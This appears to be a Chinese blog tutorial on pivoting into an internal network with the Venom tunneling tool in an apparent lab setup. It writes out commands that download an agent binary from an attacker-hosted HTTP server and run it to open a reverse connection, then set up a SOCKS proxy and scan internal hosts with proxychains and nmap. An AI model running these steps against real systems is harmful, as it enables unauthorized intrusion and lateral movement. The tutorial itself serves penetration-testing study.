Venom 内网穿透

Venom 内网穿透

项目地址:https://github.com/Dliv3/Venom/releases


前言

内网穿透代理工具Venom使用
在客户端跟服务器端建立隧道

一、进入内网

利用Venom建立一条跟kali连接的隧道把网络打通,kali基于Venom代理去扫描内网,对内网进行渗透。

二、使用步骤

1.进入Venom路径目录

客户端目标是linux程序所以使用agent_linux_x64
需要把agent_linux_x64传输到目标系统上
服务端运行admin_linux_x64

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ ls
admin.exe        admin_linux_x86  agent_arm_eabi5  agent_linux_x64  agent_macos_x64        changelog
admin_linux_x64  admin_macos_x64  agent.exe        agent_linux_x86  agent_mipsel_version1  scripts

2.运行服务端

本地监听一个端口等待着目标服务系统建立一个反弹的连接

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ ./admin_linux_x64 -lport 9999 
Venom Admin Node Start...

3.客户端计算机

首先需要获取到客户端agent_linux_x64程序
获取的方法可以在kali上启动一个http服务
然后在目标靶机上运行wget,把kali上的程序下载到客户端

使用python3 调用http模块,启动一个server,监听80 端口
kali上启动了一个http.sever 的web服务

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

回到目标系统通过wget访问kali服务器系统上的http服务
把agent_linux_x64下载到客户端

/app # wget http://192.168.0.7/agent_linux_x64
Connecting to 192.168.0.7 (192.168.0.7:80)
agent_linux_x64      100% |*******************************|  3791k  0:00:00 ETA

ls看到已经下载下来了

/app # ls
Dockerfile
agent_linux_x64
main.py
requirements.txt
templates

chmod赋予agent_linux_x64可执行的权限
然后执行远程Venom 的服务器端
rhost 指定IP(kali服务器端的IP)
rport指定远程服务器端口(kali服务器端的监听端口)
客户端

/app # chmod +x agent_linux_x64
/app # ./agent_linux_x64 -rhost  192.168.0.7 -rport 9999
与服务器端建立连接
2022/04/15 14:44:17 [+]Successfully connects to a new node

服务器端

可以通过show命令查看建立的连接
(admin node) >>> show
A
+ -- 1

goto 到节点
启动socks监听
这样就在kali上使用了一个socks 1080 的监听代理

(admin node) >>> goto 1
node 1
(node 1) >>> socks 1080 
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>> (node 1) >>> 

4.挂载proxychains

虽然建立了连接但是不能使用外部工具扫描,还需要挂载proxychains,这样才能对代理的内网进行信息收集
修改proxychains配置文件

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ sudo vim /etc/proxychains4.conf 

改为socks5(1080为启动的代理侦听端口)

socks5  127.0.0.1 1080

三、对内网进行信息收集

这里使用nmap 对内网进行扫描

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ proxychains nmap -Pn -sT 172.17.0.1 

可以看到开放了 225000 端口
Nmap scan report for 172.17.0.1
Host is up (0.015s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

对内网 172.10.0.1开放的 22 5000 端口进行服务发现

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ proxychains nmap -p 22,5000 -sV -Pn -sT 172.17.0.1   

22、5000端口开放的服务

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现5000端口开放的是http服务,可以使用浏览器打开
但浏览器也必须要设置代理
使用socks代理
在这里插入图片描述
访问成功
在这里插入图片描述

依次对扫描出来的内网IP进行服务发现,这里就不一一重复了
IP太多或者麻烦的可以定义一个变量来对整个网段循环扫描
在这里插入图片描述
剩下的就是主机发现,服务发现,扫描端口,利用漏洞,等等等等一系列的操作了,就不在往下写了,以后我也会出一些对内网漏洞利用的一些文章。

Venom 内网代理穿透

  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值